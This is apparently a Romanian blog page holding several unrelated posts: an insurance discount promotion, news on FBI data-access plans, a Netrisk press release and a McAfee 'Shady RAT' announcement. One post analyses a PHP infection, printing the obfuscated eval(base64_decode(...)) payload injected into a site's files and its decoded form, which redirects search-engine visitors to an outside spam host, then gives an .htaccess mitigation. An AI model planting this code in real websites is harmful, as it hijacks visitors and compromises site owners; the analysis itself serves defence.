Reducere 5% pentru orice tip de asigurare: Asigurari auto: Asigurare RCA (ieftin), Asigurare CASCO (ieftin), Asigurari TRAVEL, Asigurare locuinta obligatorie
Portalul www.asigura.ro ofera posibilitatea de a-ti calcula in timp real pretul oricarui tip de asigurare:
Asigurari AUTO: Asigurare RCA, Asigurare CASCO
Asigurari de tip Property, Asigurare de tip TRAVEL (calatorii) etc.
Am participat la dezvoltarea acestui portal si oamenii sunt profi. Ofera sfaturi, informatii despre asigurari de orice tip, au si un calculator de asigurari rca, casco, travel.
Ofer GRATUIT un voucher cu 5% reducere pentru orice tip de asigurare cumparata de pe www.asigura.ro.
Codul acestui voucher este: 5BU3K8BG
Acest voucher se poate utiliza de orice persoana din Romania, de cate ori vrea pe portalul www.asigura.ro.
Puteti sa-l trimiteti si prietenilor.
FBI vrea acces la conturile de pe Facebook, Twitter si e-mail
Sefii agentiei s-au intalnit cu reprezentanti ai industriei IT (de la Facebook, Yahoo! si Google) si i-au rugat sa nu se opuna propuenrii legislative inaintate de ei, prin care vor pune mana pe datele publicate pe retele de socializare, relateaza Mashable.
Site-urile vizate sunt "rugate" sa-si insereze un cod furnizat de guvernul american care va facilita logarea instantanee a autoritatilor si citirea datelor utilizatorilor.Propunerea va actualiza legea CALEA (Communications Assistance for Law Enforcement Act) ce dateaza din anul 1994, noua lege urmand sa fie extinsa si la serviciile de mesagerie instant si telefonie pe internet (VoIP).
In cazul conturilor de email, vor fi incluse doar platformele care depasesc un anumit numar de utilizatori.
Google, Yahoo! si Facebook nu au facut inca niciun comentariu.
Virus php eval(base64_decode … clean (PHP/Agent.YA.23 PHP virus)
In urma cu cateva zile un amic m-a rugat sa arunc o privire peste site-urile pe care le administreaza, pentru ca ii apare un mesaj prin care i se spune ca este virusat cand acceseaza orice pagina din cadrul acestor site-uri.
Mi-am activat antivirusul si firewall-ul si am accesat si eu acele site-uri. Totul se comporta normal.
Am cautat si in Google acele site-uri si mare mi-a fost surprinderea cand am vazut ca sunt directionat catre site-ul http://minkof.sellclassics.com/.
Cam atat din punctul de vedere user. Am intrat si in spate, FTP.
Mirare! Toate fisierele php aveau un cod ciudat:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0
KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9
JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkd
WFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcm
VmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZ
lcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZX
IsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3
ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcm
VyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3Ry
KCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2
VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4q
PylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzd
HJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29t
IikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwia
W51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNlbGxjbGFzc2ljcy5jb20v
Iik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
Totodata AVIRA mi-a semnalat un virus:
Contains recognition pattern of the PHP/Agent.YA.23 PHP virus
Decodand, avem urmatorul cod:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://minkof.sellclassics.com/");
exit();
}
}
}
}
}
Din punct de vedere programatic observam ca este o codificare ... toate intrarile sunt monitorizate si in cazul in care acest site este cautat prin google de exemplu sunt redirectionate catre http://minkof.sellclassics.com/.
Dar ce este de facut ?
Inainte de a gasi o solutie optima am preferat sa dezactivez functia eval din php direct din .htaccess utilizand urmatoarea comanda:
php_value disable_functions "eval"
Acum urmeaza sa fac investigatii privind cine adauga aceste linii de cod.
Voi reveni cu o solutie cat de curand.
Razvan Moise
Netrisk, primul one stop shop în asigurările online
Netrisk Broker de Asigurare, cel mai mare broker de asigurări online din Ungaria anunṭă relansarea operaṭiunilor sale din România prin achiziṭia domeniului www.asigura.ro. www.asigura.ro a fost înființat în 2001 şi este cel mai vechi website de asigurări online din Romania.
Netrisk Broker de Asigurare, prin intermediul Asigura.ro va crea primul one stop shop în domeniul asigurărilor online. Aici, orice persoană interesată de achiziṭionarea unei asigurări va putea găsi comparaṭii complete ale preṭurilor oferite de companiile de asigurare şi va putea cumpara asigurarea în câteva minute. Livrarea se va face în mod gratuit la adresa menṭionată de client, fiind disponibilă atât livrarea în 24 de ore cât şi în regim de urgenṭă pentru plata ramburs sau livrarea electronică atunci când plata se face online cu cardul bancar.
Pe Asigura.ro sunt disponibile comparaṭii complete pentru asigurarea RCA, împreună cu recomandări și informaṭii detaliate despre tot ceea ce înseamnă asigurari. În curând vor fi implementate şi comparatoarele pentru asigurarea CASCO, asigurarea de locuinṭe, asigurarea medicală de călatorie în străinatate şi asigurarea de sănatate.
Netrisk Broker de Asigurare, prin intermediul Asigura.ro, este un broker de asigurare independent ce lucrează cu toate companiile de asigurare pentru a putea identifica şi oferi clienṭilor săi cele mai bune oferte disponibile în piaṭă.
Netrisk a investit semnificativ în ultima perioadă în modernizarea website-ului asigura.ro și în dezvoltarea unei platforme de vânzări online performante, aceasta devenind una dintre cele mai avansate soluṭii tehnice din punctul de vedere al siguranṭei și al funcṭionalităṭilor disponibile clienṭilor.
“Pentru noi, este foarte important să oferim servicii rapide și complete clienților noștri: pornind de la cea mai potrivită soluție de asigurare, până la recomandări complete și asistenṭă în cazul producerii unei daune. Iar site-ul asigura.ro, cel mai vechi din acest domeniu, a fost punctul de plecare perfect pentru planurile noastre de dezvoltare” a declarat Răzvan Pavel, directorul general al Netrisk România.
Pe lângă dezvoltarea platformei tehnice, relansarea înseamnă și o echipă de management complet noua condusă de către dl. Răzvan Pavel, cu o experiență de peste 10 ani în poziții management importante din cadrul Allianz-Ţiriac şi Groupama România.
“Suntem aici pentru a schimba piața de asigurări online din România, pentru ca suntem convinsi ca mediul online din România se va dezvolta şi în domeniul asigurărilor. Pe de alta parte, prin know-how-ul cu care venim pentru a construi un comparator integrat, noi vom sustine dezvoltarea pieței de asigurări online din România”, a declarat Răzvan Pavel, directorul general al Netrisk România
În lumea asigurărilor, piaṭa din Marea Britanie este constant văzută ca o fereastră către viitor, iar în această piaṭă peste 80% din vânzările in retail se fac în mediul online. Tendinṭa din Marea Britanie se extinde de o bună perioadă în Europa, ṭări precum Spania şi Franta fiind în plină extindere a acestui fenomen. Nu mai depate de Ungaria se întamplă acelaşi lucru, vânzările de retail din această ṭară fiind realizate într-o proporṭie importantă în mediul online, iar Netrisk este liderul acestei piete. Privind astfel lucrurile, mai devreme sau mai târziu, mediul online din România se va dezvolta şi în domeniul asigurărilor.
“Piața asigurărilor online din România este încă la început, în sensul că sunt puține site-uri ce fac cu adevarat comparaṭii şi vânzări online de asigurări. Cel mai adesea, clienții care vor să își încheie polițele de asigurare online, trebuie să intre pe site-ul fiecărei companii de asigurare pentru a afla o cotație de preț și asta înseamnă mult timp irosit, iar mediul online presupune uşurinṭă și soluții imediate, exact ceea ce oferă acum Asigura.ro.” a declarat Răzvan Pavel.
În momentul de faṭă brokerii de asigurare dedicaṭi 100% activităṭii online sunt foarte puṭini sau foarte mici. Marea lor majoritate limitându-se la a avea o prezenṭă online pentru a susṭine dezvoltarea modelului clasic de business. Netrisk Broker de Asigurare, prin intermediul Asigura.ro este dedicat 100% mediului online şi scopului de a găsi cele mai bune soluṭii pentru clienṭii săi, de aici și oportunitatea pe care o vedem în acest tip business.
Mediul online a devenit foarte competitiv în ultimii ani, tendinṭă ce s-a resimiṭit şi în domeniul asigurărilor. În prezent, sunt peste 2,5 mil de cautări lunare pe Google care au legatură cu cuvântul asigurări.
“Piaṭa de asigurări online începe să devină atractivă pentru mulṭi jucători, atât pentru furnizorii de servicii de asigurări cât şi pentru clienṭi. Noi ne dorim ca Asigura.ro să devină etalonul pieṭei asigurărilor online” a mai spus Răzvan Pavel.
Asigura.ro colaborează cu toate companiile de asigurări din România și oferă clienṭilor săi facilități complete adecvate unei aplicaṭii moderne de comerț online:
- control total al comenzilor – clienții pot să vadă în permanență care este situația asigurărilor încheiate (din momentul plasării comenzii, până la momentul plății ratelor și reînnoirea asigurării);
- informații complete – clienții pot să discute direct cu operatorii în legătură cu orice aspect legat de asigurarea lor sau de comanda a lor;
- siguranța tranzactiilor – site-ul este auditat de Verisign pentru protecție;
- sfaturi utile – o secțiune detaliată despre ce trebuie făcut în caz de producere a riscurilor asigurate;
- ştiri – promovează ultimele noutăṭi din lumea asigurărilor atat din punct de vedere financiar cât şi al produselor şi reglementărilor legale.
Pe lângă aceste funcționalități extinse, trebuie subliniat că noul site este orientat către necesităṭile clienṭilor, ce ceea ce îl face să devină o unealtă puternică în sprijinul celor ce doresc să achiziṭioneze o asigurare la un preṭ corect.
Netrisk România este reprezentanța celui mai mare broker online de asigurări din Ungaria, fiind prezent pe piața din România încă din 2009, prin deschiderea unui birou la Cluj si demararea unor operaṭiuni online prin intermediul www.netas.ro. În 2011 compania și-a intensificat activitatea și a decis achizitionarea site-ului asigura.ro, care devine astfel platforma principală de vânzări a companiei.
Netrisk este cel mai mare broker independent de asigurări online din Ungaria şi deṭine o cotă de piață de peste 70% din piața de intermedieri în asigurări online (la sfârșitul anului 2010). Compania distribuie o gamă completă de asigurări generale: asigurarea obligatorie RCA, asigurarea CASCO, asigurări de locuinţe şi de călătorie. În 2010, pachetul majoritar de acțiuni al Netrisk Ungaria a fost achiziṭionat de către Enterprise Investors, noul acṭionar fiind pregătit să susṭină financiar dezvoltarea companiei în Europa Centrala şi de Est
Enterprise Investors este unul dintre cele mai mari fonduri de investiții de private equity și venture capital din CEE. În prezent, administrează un capital de peste 1,7 miliarde euro și a realizat investiții semnificative în mai mult de 120 de companii. În România, fondul a investit in jur de 200 milioane de EUR. Investițiile directe din România cuprind, printre altele, Macon (liderul pieței românești a materialelor de construcții), Siveco (cea mai mare companie românească de software), Profi (unul dintre cele mai mari lanțuri de supermarketuri) și Smartree (companie de servicii externalizate de resurse umane).
5 ani de amenintari, peste 70 de companii din intreaga lume
McAfee dezvaluie istoricul operatiunii “Shady RAT”.
Provision, liderul pietei de securitate a informatiei din Romania si furnizor de servicii profesionale, in calitate de distribuitor pentru produsele McAfee in Romania, anunta descoperirea companiei McAfee: peste 70 de companii din intreaga lume, de la companii guvernamentale pana la organizatii non-profit, au fost victimele celui mai mare atac informatic din istorie, cunoscut sub numele de Operatiunea „Shady RAT (Remote Access Control)”.
La inceputul lunii august 2011, McAfee Labs a reusit, in urma cercetarilor amanuntite intreprinse, sa acceseze informatii referitoare la peste 5 ani de atacuri realizate de hackeri prin intermediul unui server de comanda si control (C&C). Prin accesarea acestui server (denumit Shady RAT), McAfee Labs a investigat istoricul log-urilor precizand ca amenintarile generate de catre acesta sunt extrem de periculoase si foarte greu de detectat.
Conform raportului, datele culese indica faptul ca primele atacuri au inceput la jumatatea anului 2006, insa nu se exclude posibilitatea ca acestea sa fi inceput cu mult timp inainte.
Modul de manifestare al atacului este relativ simplu: un email, din categoria celor folosite in phising-ul directionat, ce contine un program malware de tip exploit, este trimis la un angajat care are un nivel ridicat de acces la informatiile companiei. Odata deschis programul malware de tip exploit pe un sistem vulnerabil, va declansa descarcarea automata a malware-ului in sistem, oferind hacker-ilor posibilitatea de a colecta o serie de informatii confidentiale din compania respectiva.
Dupa o analiza minutioasa a log-urilor, concluziile raportului McAfee evidentiaza faptul ca toate companiile pot fi supuse unui astfel de atac, indiferent de zona geografica in care activeaza, de sfera de activitate (publica, privata, guvernamentala) sau de dimensiunea acestora (de la agentii guvernamentale pana la cele non-profit). Atacul asupra unei companii poate dura de la 1 luna pana la 28 de luni, asa cum a fost si cazul Comitetului International Olimpic (CIO) din Asia, una dintre “victimele” inscrise in lista celor 72 de companii supuse atacului informatic.
Momentan nu exista date concrete referitoare la identitatea hacker-ilor, la volumul si valoarea informatiilor pierdute.
Conform lui Dmitri Alperovitch, vicepresedintele McAfee, informatiile furate ar putea avea un impact la nivelul securitatii si economiei fiecarei tari supuse atacului informatic.
Raportul McAfee se incheie cu o concluzie interesanta si in acelasi timp importanta: “In Fortune Global 2000, sunt doua tipuri de companii: cele care au fost atacate si STIU, si cele care au fost atacate si INCA NU STIU”, Dmitri Alperovitch, Vice President, Threat Research, McAfee.
Pentru mai multe informatii:
- Raportul Operatiunii Shady RAT: http://www.mcafee.com/us/resources/white-papers/wp-operation-shady-rat.pdf
- Jurnalul atacului: http://www.mcafee.com/us/resources/data-sheets/ds-diary-of-a-rat.pdf
Despre McAfee
McAfee, Inc., Santa-Clara, California, este cea mai mare companie din lume dedicata securitatii informatiei. McAfee ofera solutii proactive si testate precum si servicii cu ajutorul carora se securizeaza sisteme, retele si aparate mobile din intreaga lume, permitand astfel utilizatorilor de a se conecta in siguranta la Internet, de a naviga si de a face cumparaturi online mult mai sigure.
Despre PROVISION SOFTWARE DIVISION
provision este cel mai important distribuitor IT, cu valoare adaugata, de solutii si servicii profesionale adresate companiilor private si sectorului public din Romania.
provision adauga valoare distributiei prin servicii de consultanta, design, arhitecturare, presales, suport tehnic si optimizare a infrastructurilor de comunicatii, precum si prin servicii de educatie, training si testare in parteneriat cu prestigioase institutii internationale cum ar fi (ISC)2, British Standards Institution, EC-Council, Pearson-VUE si Thomson Prometric.




